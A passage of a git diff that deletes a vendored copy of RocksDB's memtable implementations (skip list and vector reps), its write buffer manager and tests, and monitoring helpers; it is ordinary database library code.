-  virtual void InsertConcurrently(KeyHandle handle) override {
-    skip_list_.InsertConcurrently(static_cast<char*>(handle));
-  }
-
-  // Returns true iff an entry that compares equal to key is in the list.
-  virtual bool Contains(const char* key) const override {
-    return skip_list_.Contains(key);
-  }
-
-  virtual size_t ApproximateMemoryUsage() override {
-    // All memory is allocated through allocator; nothing to report here
-    return 0;
-  }
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override {
-    SkipListRep::Iterator iter(&skip_list_);
-    Slice dummy_slice;
-    for (iter.Seek(dummy_slice, k.memtable_key().data());
-         iter.Valid() && callback_func(callback_args, iter.key());
-         iter.Next()) {
-    }
-  }
-
-  uint64_t ApproximateNumEntries(const Slice& start_ikey,
-                                 const Slice& end_ikey) override {
-    std::string tmp;
-    uint64_t start_count =
-        skip_list_.EstimateCount(EncodeKey(&tmp, start_ikey));
-    uint64_t end_count = skip_list_.EstimateCount(EncodeKey(&tmp, end_ikey));
-    return (end_count >= start_count) ? (end_count - start_count) : 0;
-  }
-
-  virtual ~SkipListRep() override { }
-
-  // Iteration over the contents of a skip list
-  class Iterator : public MemTableRep::Iterator {
-    InlineSkipList<const MemTableRep::KeyComparator&>::Iterator iter_;
-
-   public:
-    // Initialize an iterator over the specified list.
-    // The returned iterator is not valid.
-    explicit Iterator(
-        const InlineSkipList<const MemTableRep::KeyComparator&>* list)
-        : iter_(list) {}
-
-    virtual ~Iterator() override { }
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override {
-      return iter_.Valid();
-    }
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override {
-      return iter_.key();
-    }
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override {
-      iter_.Next();
-    }
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override {
-      iter_.Prev();
-    }
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& user_key, const char* memtable_key)
-        override {
-      if (memtable_key != nullptr) {
-        iter_.Seek(memtable_key);
-      } else {
-        iter_.Seek(EncodeKey(&tmp_, user_key));
-      }
-    }
-
-    // Retreat to the last entry with a key <= target
-    virtual void SeekForPrev(const Slice& user_key,
-                             const char* memtable_key) override {
-      if (memtable_key != nullptr) {
-        iter_.SeekForPrev(memtable_key);
-      } else {
-        iter_.SeekForPrev(EncodeKey(&tmp_, user_key));
-      }
-    }
-
-    // Position at the first entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    virtual void SeekToFirst() override {
-      iter_.SeekToFirst();
-    }
-
-    // Position at the last entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    virtual void SeekToLast() override {
-      iter_.SeekToLast();
-    }
-   protected:
-    std::string tmp_;       // For passing to EncodeKey
-  };
-
-  // Iterator over the contents of a skip list which also keeps track of the
-  // previously visited node. In Seek(), it examines a few nodes after it
-  // first, falling back to O(log n) search from the head of the list only if
-  // the target key hasn't been found.
-  class LookaheadIterator : public MemTableRep::Iterator {
-   public:
-    explicit LookaheadIterator(const SkipListRep& rep) :
-        rep_(rep), iter_(&rep_.skip_list_), prev_(iter_) {}
-
-    virtual ~LookaheadIterator() override {}
-
-    virtual bool Valid() const override {
-      return iter_.Valid();
-    }
-
-    virtual const char *key() const override {
-      assert(Valid());
-      return iter_.key();
-    }
-
-    virtual void Next() override {
-      assert(Valid());
-
-      bool advance_prev = true;
-      if (prev_.Valid()) {
-        auto k1 = rep_.UserKey(prev_.key());
-        auto k2 = rep_.UserKey(iter_.key());
-
-        if (k1.compare(k2) == 0) {
-          // same user key, don't move prev_
-          advance_prev = false;
-        } else if (rep_.transform_) {
-          // only advance prev_ if it has the same prefix as iter_
-          auto t1 = rep_.transform_->Transform(k1);
-          auto t2 = rep_.transform_->Transform(k2);
-          advance_prev = t1.compare(t2) == 0;
-        }
-      }
-
-      if (advance_prev) {
-        prev_ = iter_;
-      }
-      iter_.Next();
-    }
-
-    virtual void Prev() override {
-      assert(Valid());
-      iter_.Prev();
-      prev_ = iter_;
-    }
-
-    virtual void Seek(const Slice& internal_key, const char *memtable_key)
-        override {
-      const char *encoded_key =
-        (memtable_key != nullptr) ?
-            memtable_key : EncodeKey(&tmp_, internal_key);
-
-      if (prev_.Valid() && rep_.cmp_(encoded_key, prev_.key()) >= 0) {
-        // prev_.key() is smaller or equal to our target key; do a quick
-        // linear search (at most lookahead_ steps) starting from prev_
-        iter_ = prev_;
-
-        size_t cur = 0;
-        while (cur++ <= rep_.lookahead_ && iter_.Valid()) {
-          if (rep_.cmp_(encoded_key, iter_.key()) <= 0) {
-            return;
-          }
-          Next();
-        }
-      }
-
-      iter_.Seek(encoded_key);
-      prev_ = iter_;
-    }
-
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) override {
-      const char* encoded_key = (memtable_key != nullptr)
-                                    ? memtable_key
-                                    : EncodeKey(&tmp_, internal_key);
-      iter_.SeekForPrev(encoded_key);
-      prev_ = iter_;
-    }
-
-    virtual void SeekToFirst() override {
-      iter_.SeekToFirst();
-      prev_ = iter_;
-    }
-
-    virtual void SeekToLast() override {
-      iter_.SeekToLast();
-      prev_ = iter_;
-    }
-
-   protected:
-    std::string tmp_;       // For passing to EncodeKey
-
-   private:
-    const SkipListRep& rep_;
-    InlineSkipList<const MemTableRep::KeyComparator&>::Iterator iter_;
-    InlineSkipList<const MemTableRep::KeyComparator&>::Iterator prev_;
-  };
-
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena = nullptr) override {
-    if (lookahead_ > 0) {
-      void *mem =
-        arena ? arena->AllocateAligned(sizeof(SkipListRep::LookaheadIterator))
-              : operator new(sizeof(SkipListRep::LookaheadIterator));
-      return new (mem) SkipListRep::LookaheadIterator(*this);
-    } else {
-      void *mem =
-        arena ? arena->AllocateAligned(sizeof(SkipListRep::Iterator))
-              : operator new(sizeof(SkipListRep::Iterator));
-      return new (mem) SkipListRep::Iterator(&skip_list_);
-    }
-  }
-};
-}
-
-MemTableRep* SkipListFactory::CreateMemTableRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform* transform, Logger* logger) {
-  return new SkipListRep(compare, allocator, transform, lookahead_);
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/memtable/stl_wrappers.h b/thirdparty/rocksdb/memtable/stl_wrappers.h
deleted file mode 100644
index 19fa151..0000000
--- a/thirdparty/rocksdb/memtable/stl_wrappers.h
+++ /dev/null
@@ -1,34 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <map>
-#include <string>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/murmurhash.h"
-
-namespace rocksdb {
-namespace stl_wrappers {
-
-class Base {
- protected:
-  const MemTableRep::KeyComparator& compare_;
-  explicit Base(const MemTableRep::KeyComparator& compare)
-      : compare_(compare) {}
-};
-
-struct Compare : private Base {
-  explicit Compare(const MemTableRep::KeyComparator& compare) : Base(compare) {}
-  inline bool operator()(const char* a, const char* b) const {
-    return compare_(a, b) < 0;
-  }
-};
-
-}
-}
diff --git a/thirdparty/rocksdb/memtable/vectorrep.cc b/thirdparty/rocksdb/memtable/vectorrep.cc
deleted file mode 100644
index e54025c..0000000
--- a/thirdparty/rocksdb/memtable/vectorrep.cc
+++ /dev/null
@@ -1,303 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-#include "rocksdb/memtablerep.h"
-
-#include <unordered_set>
-#include <set>
-#include <memory>
-#include <algorithm>
-#include <type_traits>
-
-#include "util/arena.h"
-#include "db/memtable.h"
-#include "memtable/stl_wrappers.h"
-#include "port/port.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-namespace {
-
-using namespace stl_wrappers;
-
-class VectorRep : public MemTableRep {
- public:
-  VectorRep(const KeyComparator& compare, Allocator* allocator, size_t count);
-
-  // Insert key into the collection. (The caller will pack key and value into a
-  // single buffer and pass that in as the parameter to Insert)
-  // REQUIRES: nothing that compares equal to key is currently in the
-  // collection.
-  virtual void Insert(KeyHandle handle) override;
-
-  // Returns true iff an entry that compares equal to key is in the collection.
-  virtual bool Contains(const char* key) const override;
-
-  virtual void MarkReadOnly() override;
-
-  virtual size_t ApproximateMemoryUsage() override;
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override;
-
-  virtual ~VectorRep() override { }
-
-  class Iterator : public MemTableRep::Iterator {
-    class VectorRep* vrep_;
-    std::shared_ptr<std::vector<const char*>> bucket_;
-    std::vector<const char*>::const_iterator mutable cit_;
-    const KeyComparator& compare_;
-    std::string tmp_;       // For passing to EncodeKey
-    bool mutable sorted_;
-    void DoSort() const;
-   public:
-    explicit Iterator(class VectorRep* vrep,
-      std::shared_ptr<std::vector<const char*>> bucket,
-      const KeyComparator& compare);
-
-    // Initialize an iterator over the specified collection.
-    // The returned iterator is not valid.
-    // explicit Iterator(const MemTableRep* collection);
-    virtual ~Iterator() override { };
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override;
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override;
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override;
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override;
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& user_key, const char* memtable_key) override;
-
-    // Advance to the first entry with a key <= target
-    virtual void SeekForPrev(const Slice& user_key,
-                             const char* memtable_key) override;
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override;
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override;
-  };
-
-  // Return an iterator over the keys in this representation.
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena) override;
-
- private:
-  friend class Iterator;
-  typedef std::vector<const char*> Bucket;
-  std::shared_ptr<Bucket> bucket_;
-  mutable port::RWMutex rwlock_;
-  bool immutable_;
-  bool sorted_;
-  const KeyComparator& compare_;
-};
-
-void VectorRep::Insert(KeyHandle handle) {
-  auto* key = static_cast<char*>(handle);
-  WriteLock l(&rwlock_);
-  assert(!immutable_);
-  bucket_->push_back(key);
-}
-
-// Returns true iff an entry that compares equal to key is in the collection.
-bool VectorRep::Contains(const char* key) const {
-  ReadLock l(&rwlock_);
-  return std::find(bucket_->begin(), bucket_->end(), key) != bucket_->end();
-}
-
-void VectorRep::MarkReadOnly() {
-  WriteLock l(&rwlock_);
-  immutable_ = true;
-}
-
-size_t VectorRep::ApproximateMemoryUsage() {
-  return
-    sizeof(bucket_) + sizeof(*bucket_) +
-    bucket_->size() *
-    sizeof(
-      std::remove_reference<decltype(*bucket_)>::type::value_type
-    );
-}
-
-VectorRep::VectorRep(const KeyComparator& compare, Allocator* allocator,
-                     size_t count)
-    : MemTableRep(allocator),
-      bucket_(new Bucket()),
-      immutable_(false),
-      sorted_(false),
-      compare_(compare) {
-  bucket_.get()->reserve(count);
-}
-
-VectorRep::Iterator::Iterator(class VectorRep* vrep,
-                   std::shared_ptr<std::vector<const char*>> bucket,
-                   const KeyComparator& compare)
-: vrep_(vrep),
-  bucket_(bucket),
-  cit_(bucket_->end()),
-  compare_(compare),
-  sorted_(false) { }
-
-void VectorRep::Iterator::DoSort() const {
-  // vrep is non-null means that we are working on an immutable memtable
-  if (!sorted_ && vrep_ != nullptr) {
-    WriteLock l(&vrep_->rwlock_);
-    if (!vrep_->sorted_) {
-      std::sort(bucket_->begin(), bucket_->end(), Compare(compare_));
-      cit_ = bucket_->begin();
-      vrep_->sorted_ = true;
-    }
-    sorted_ = true;
-  }
-  if (!sorted_) {
-    std::sort(bucket_->begin(), bucket_->end(), Compare(compare_));
-    cit_ = bucket_->begin();
-    sorted_ = true;
-  }
-  assert(sorted_);
-  assert(vrep_ == nullptr || vrep_->sorted_);
-}
-
-// Returns true iff the iterator is positioned at a valid node.
-bool VectorRep::Iterator::Valid() const {
-  DoSort();
-  return cit_ != bucket_->end();
-}
-
-// Returns the key at the current position.
-// REQUIRES: Valid()
-const char* VectorRep::Iterator::key() const {
-  assert(sorted_);
-  return *cit_;
-}
-
-// Advances to the next position.
-// REQUIRES: Valid()
-void VectorRep::Iterator::Next() {
-  assert(sorted_);
-  if (cit_ == bucket_->end()) {
-    return;
-  }
-  ++cit_;
-}
-
-// Advances to the previous position.
-// REQUIRES: Valid()
-void VectorRep::Iterator::Prev() {
-  assert(sorted_);
-  if (cit_ == bucket_->begin()) {
-    // If you try to go back from the first element, the iterator should be
-    // invalidated. So we set it to past-the-end. This means that you can
-    // treat the container circularly.
-    cit_ = bucket_->end();
-  } else {
-    --cit_;
-  }
-}
-
-// Advance to the first entry with a key >= target
-void VectorRep::Iterator::Seek(const Slice& user_key,
-                               const char* memtable_key) {
-  DoSort();
-  // Do binary search to find first value not less than the target
-  const char* encoded_key =
-      (memtable_key != nullptr) ? memtable_key : EncodeKey(&tmp_, user_key);
-  cit_ = std::equal_range(bucket_->begin(),
-                          bucket_->end(),
-                          encoded_key,
-                          [this] (const char* a, const char* b) {
-                            return compare_(a, b) < 0;
-                          }).first;
-}
-
-// Advance to the first entry with a key <= target
-void VectorRep::Iterator::SeekForPrev(const Slice& user_key,
-                                      const char* memtable_key) {
-  assert(false);
-}
-
-// Position at the first entry in collection.
-// Final state of iterator is Valid() iff collection is not empty.
-void VectorRep::Iterator::SeekToFirst() {
-  DoSort();
-  cit_ = bucket_->begin();
-}
-
-// Position at the last entry in collection.
-// Final state of iterator is Valid() iff collection is not empty.
-void VectorRep::Iterator::SeekToLast() {
-  DoSort();
-  cit_ = bucket_->end();
-  if (bucket_->size() != 0) {
-    --cit_;
-  }
-}
-
-void VectorRep::Get(const LookupKey& k, void* callback_args,
-                    bool (*callback_func)(void* arg, const char* entry)) {
-  rwlock_.ReadLock();
-  VectorRep* vector_rep;
-  std::shared_ptr<Bucket> bucket;
-  if (immutable_) {
-    vector_rep = this;
-  } else {
-    vector_rep = nullptr;
-    bucket.reset(new Bucket(*bucket_));  // make a copy
-  }
-  VectorRep::Iterator iter(vector_rep, immutable_ ? bucket_ : bucket, compare_);
-  rwlock_.ReadUnlock();
-
-  for (iter.Seek(k.user_key(), k.memtable_key().data());
-       iter.Valid() && callback_func(callback_args, iter.key()); iter.Next()) {
-  }
-}
-
-MemTableRep::Iterator* VectorRep::GetIterator(Arena* arena) {
-  char* mem = nullptr;
-  if (arena != nullptr) {
-    mem = arena->AllocateAligned(sizeof(Iterator));
-  }
-  ReadLock l(&rwlock_);
-  // Do not sort here. The sorting would be done the first time
-  // a Seek is performed on the iterator.
-  if (immutable_) {
-    if (arena == nullptr) {
-      return new Iterator(this, bucket_, compare_);
-    } else {
-      return new (mem) Iterator(this, bucket_, compare_);
-    }
-  } else {
-    std::shared_ptr<Bucket> tmp;
-    tmp.reset(new Bucket(*bucket_)); // make a copy
-    if (arena == nullptr) {
-      return new Iterator(nullptr, tmp, compare_);
-    } else {
-      return new (mem) Iterator(nullptr, tmp, compare_);
-    }
-  }
-}
-} // anon namespace
-
-MemTableRep* VectorRepFactory::CreateMemTableRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform*, Logger* logger) {
-  return new VectorRep(compare, allocator, count_);
-}
-} // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/write_buffer_manager.cc b/thirdparty/rocksdb/memtable/write_buffer_manager.cc
deleted file mode 100644
index bac0fdd..0000000
--- a/thirdparty/rocksdb/memtable/write_buffer_manager.cc
+++ /dev/null
@@ -1,124 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/write_buffer_manager.h"
-#include <mutex>
-#include "util/coding.h"
-
-namespace rocksdb {
-#ifndef ROCKSDB_LITE
-namespace {
-const size_t kSizeDummyEntry = 1024 * 1024;
-// The key will be longer than keys for blocks in SST files so they won't
-// conflict.
-const size_t kCacheKeyPrefix = kMaxVarint64Length * 4 + 1;
-}  // namespace
-
-struct WriteBufferManager::CacheRep {
-  std::shared_ptr<Cache> cache_;
-  std::mutex cache_mutex_;
-  std::atomic<size_t> cache_allocated_size_;
-  // The non-prefix part will be updated according to the ID to use.
-  char cache_key_[kCacheKeyPrefix + kMaxVarint64Length];
-  uint64_t next_cache_key_id_ = 0;
-  std::vector<Cache::Handle*> dummy_handles_;
-
-  explicit CacheRep(std::shared_ptr<Cache> cache)
-      : cache_(cache), cache_allocated_size_(0) {
-    memset(cache_key_, 0, kCacheKeyPrefix);
-    size_t pointer_size = sizeof(const void*);
-    assert(pointer_size <= kCacheKeyPrefix);
-    memcpy(cache_key_, static_cast<const void*>(this), pointer_size);
-  }
-
-  Slice GetNextCacheKey() {
-    memset(cache_key_ + kCacheKeyPrefix, 0, kMaxVarint64Length);
-    char* end =
-        EncodeVarint64(cache_key_ + kCacheKeyPrefix, next_cache_key_id_++);
-    return Slice(cache_key_, static_cast<size_t>(end - cache_key_));
-  }
-};
-#else
-struct WriteBufferManager::CacheRep {};
-#endif  // ROCKSDB_LITE
-
-WriteBufferManager::WriteBufferManager(size_t _buffer_size,
-                                       std::shared_ptr<Cache> cache)
-    : buffer_size_(_buffer_size),
-      mutable_limit_(buffer_size_ * 7 / 8),
-      memory_used_(0),
-      memory_active_(0),
-      cache_rep_(nullptr) {
-#ifndef ROCKSDB_LITE
-  if (cache) {
-    // Construct the cache key using the pointer to this.
-    cache_rep_.reset(new CacheRep(cache));
-  }
-#endif  // ROCKSDB_LITE
-}
-
-WriteBufferManager::~WriteBufferManager() {
-#ifndef ROCKSDB_LITE
-  if (cache_rep_) {
-    for (auto* handle : cache_rep_->dummy_handles_) {
-      cache_rep_->cache_->Release(handle, true);
-    }
-  }
-#endif  // ROCKSDB_LITE
-}
-
-// Should only be called from write thread
-void WriteBufferManager::ReserveMemWithCache(size_t mem) {
-#ifndef ROCKSDB_LITE
-  assert(cache_rep_ != nullptr);
-  // Use a mutex to protect various data structures. Can be optimzied to a
-  // lock-free solution if it ends up with a performance bottleneck.
-  std::lock_guard<std::mutex> lock(cache_rep_->cache_mutex_);
-
-  size_t new_mem_used = memory_used_.load(std::memory_order_relaxed) + mem;
-  memory_used_.store(new_mem_used, std::memory_order_relaxed);
-  while (new_mem_used > cache_rep_->cache_allocated_size_) {
-    // Expand size by at least 1MB.
-    // Add a dummy record to the cache
-    Cache::Handle* handle;
-    cache_rep_->cache_->Insert(cache_rep_->GetNextCacheKey(), nullptr,
-                               kSizeDummyEntry, nullptr, &handle);
-    cache_rep_->dummy_handles_.push_back(handle);
-    cache_rep_->cache_allocated_size_ += kSizeDummyEntry;
-  }
-#endif  // ROCKSDB_LITE
-}
-
-void WriteBufferManager::FreeMemWithCache(size_t mem) {
-#ifndef ROCKSDB_LITE
-  assert(cache_rep_ != nullptr);
-  // Use a mutex to protect various data structures. Can be optimzied to a
-  // lock-free solution if it ends up with a performance bottleneck.
-  std::lock_guard<std::mutex> lock(cache_rep_->cache_mutex_);
-  size_t new_mem_used = memory_used_.load(std::memory_order_relaxed) - mem;
-  memory_used_.store(new_mem_used, std::memory_order_relaxed);
-  // Gradually shrink memory costed in the block cache if the actual
-  // usage is less than 3/4 of what we reserve from the block cache.
-  // We do this becausse:
-  // 1. we don't pay the cost of the block cache immediately a memtable is
-  //    freed, as block cache insert is expensive;
-  // 2. eventually, if we walk away from a temporary memtable size increase,
-  //    we make sure shrink the memory costed in block cache over time.
-  // In this way, we only shrink costed memory showly even there is enough
-  // margin.
-  if (new_mem_used < cache_rep_->cache_allocated_size_ / 4 * 3 &&
-      cache_rep_->cache_allocated_size_ - kSizeDummyEntry > new_mem_used) {
-    assert(!cache_rep_->dummy_handles_.empty());
-    cache_rep_->cache_->Release(cache_rep_->dummy_handles_.back(), true);
-    cache_rep_->dummy_handles_.pop_back();
-    cache_rep_->cache_allocated_size_ -= kSizeDummyEntry;
-  }
-#endif  // ROCKSDB_LITE
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/memtable/write_buffer_manager_test.cc b/thirdparty/rocksdb/memtable/write_buffer_manager_test.cc
deleted file mode 100644
index 0fc9fd0..0000000
--- a/thirdparty/rocksdb/memtable/write_buffer_manager_test.cc
+++ /dev/null
@@ -1,151 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/write_buffer_manager.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class WriteBufferManagerTest : public testing::Test {};
-
-#ifndef ROCKSDB_LITE
-TEST_F(WriteBufferManagerTest, ShouldFlush) {
-  // A write buffer manager of size 10MB
-  std::unique_ptr<WriteBufferManager> wbf(
-      new WriteBufferManager(10 * 1024 * 1024));
-
-  wbf->ReserveMem(8 * 1024 * 1024);
-  ASSERT_FALSE(wbf->ShouldFlush());
-  // 90% of the hard limit will hit the condition
-  wbf->ReserveMem(1 * 1024 * 1024);
-  ASSERT_TRUE(wbf->ShouldFlush());
-  // Scheduling for freeing will release the condition
-  wbf->ScheduleFreeMem(1 * 1024 * 1024);
-  ASSERT_FALSE(wbf->ShouldFlush());
-
-  wbf->ReserveMem(2 * 1024 * 1024);
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  wbf->ScheduleFreeMem(4 * 1024 * 1024);
-  // 11MB total, 6MB mutable. hard limit still hit
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  wbf->ScheduleFreeMem(2 * 1024 * 1024);
-  // 11MB total, 4MB mutable. hard limit stills but won't flush because more
-  // than half data is already being flushed.
-  ASSERT_FALSE(wbf->ShouldFlush());
-
-  wbf->ReserveMem(4 * 1024 * 1024);
-  // 15 MB total, 8MB mutable.
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  wbf->FreeMem(7 * 1024 * 1024);
-  // 9MB total, 8MB mutable.
-  ASSERT_FALSE(wbf->ShouldFlush());
-}
-
-TEST_F(WriteBufferManagerTest, CacheCost) {
-  // 1GB cache
-  std::shared_ptr<Cache> cache = NewLRUCache(1024 * 1024 * 1024, 4);
-  // A write buffer manager of size 50MB
-  std::unique_ptr<WriteBufferManager> wbf(
-      new WriteBufferManager(50 * 1024 * 1024, cache));
-
-  // Allocate 1.5MB will allocate 2MB
-  wbf->ReserveMem(1536 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 2 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 2 * 1024 * 1024 + 10000);
-
-  // Allocate another 2MB
-  wbf->ReserveMem(2 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 4 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 4 * 1024 * 1024 + 10000);
-
-  // Allocate another 20MB
-  wbf->ReserveMem(20 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 24 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 24 * 1024 * 1024 + 10000);
-
-  // Free 2MB will not cause any change in cache cost
-  wbf->FreeMem(2 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 24 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 24 * 1024 * 1024 + 10000);
-
-  ASSERT_FALSE(wbf->ShouldFlush());
-
-  // Allocate another 30MB
-  wbf->ReserveMem(30 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 52 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 52 * 1024 * 1024 + 10000);
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  wbf->ScheduleFreeMem(20 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 52 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 52 * 1024 * 1024 + 10000);
-
-  // Still need flush as the hard limit hits
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  // Free 20MB will releae 1MB from cache
-  wbf->FreeMem(20 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 51 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 51 * 1024 * 1024 + 10000);
-
-  ASSERT_FALSE(wbf->ShouldFlush());
-
-  // Every free will release 1MB if still not hit 3/4
-  wbf->FreeMem(16 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 50 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 50 * 1024 * 1024 + 10000);
-
-  wbf->FreeMem(16 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 49 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 49 * 1024 * 1024 + 10000);
-
-  // Free 2MB will not cause any change in cache cost
-  wbf->ReserveMem(2 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 49 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 49 * 1024 * 1024 + 10000);
-
-  wbf->FreeMem(16 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 48 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 48 * 1024 * 1024 + 10000);
-
-  // Destory write buffer manger should free everything
-  wbf.reset();
-  ASSERT_LT(cache->GetPinnedUsage(), 1024 * 1024);
-}
-
-TEST_F(WriteBufferManagerTest, NoCapCacheCost) {
-  // 1GB cache
-  std::shared_ptr<Cache> cache = NewLRUCache(1024 * 1024 * 1024, 4);
-  // A write buffer manager of size 256MB
-  std::unique_ptr<WriteBufferManager> wbf(new WriteBufferManager(0, cache));
-  // Allocate 1.5MB will allocate 2MB
-  wbf->ReserveMem(10 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 10 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 10 * 1024 * 1024 + 10000);
-  ASSERT_FALSE(wbf->ShouldFlush());
-
-  wbf->FreeMem(9 * 1024 * 1024);
-  for (int i = 0; i < 10; i++) {
-    wbf->FreeMem(16 * 1024);
-  }
-  ASSERT_GE(cache->GetPinnedUsage(), 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 1024 * 1024 + 10000);
-}
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/monitoring/file_read_sample.h b/thirdparty/rocksdb/monitoring/file_read_sample.h
deleted file mode 100644
index 9ad7d2f..0000000
--- a/thirdparty/rocksdb/monitoring/file_read_sample.h
+++ /dev/null
@@ -1,23 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "db/version_edit.h"
-#include "util/random.h"
-
-namespace rocksdb {
-static const uint32_t kFileReadSampleRate = 1024;
-extern bool should_sample_file_read();
-extern void sample_file_read_inc(FileMetaData*);
-
-inline bool should_sample_file_read() {
-  return (Random::GetTLSInstance()->Next() % kFileReadSampleRate == 307);
-}
-
-inline void sample_file_read_inc(FileMetaData* meta) {
-  meta->stats.num_reads_sampled.fetch_add(kFileReadSampleRate,
-                                          std::memory_order_relaxed);
-}
-}
diff --git a/thirdparty/rocksdb/monitoring/histogram.cc b/thirdparty/rocksdb/monitoring/histogram.cc
deleted file mode 100644
index b3c01a7..0000000
--- a/thirdparty/rocksdb/monitoring/histogram.cc
+++ /dev/null
@@ -1,287 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "monitoring/histogram.h"
-
-#include <inttypes.h>
-#include <cassert>
-#include <math.h>
-#include <stdio.h>
-
-#include "port/port.h"
-#include "util/cast_util.h"
-
-namespace rocksdb {
-
-HistogramBucketMapper::HistogramBucketMapper() {
-  // If you change this, you also need to change
-  // size of array buckets_ in HistogramImpl
-  bucketValues_ = {1, 2};
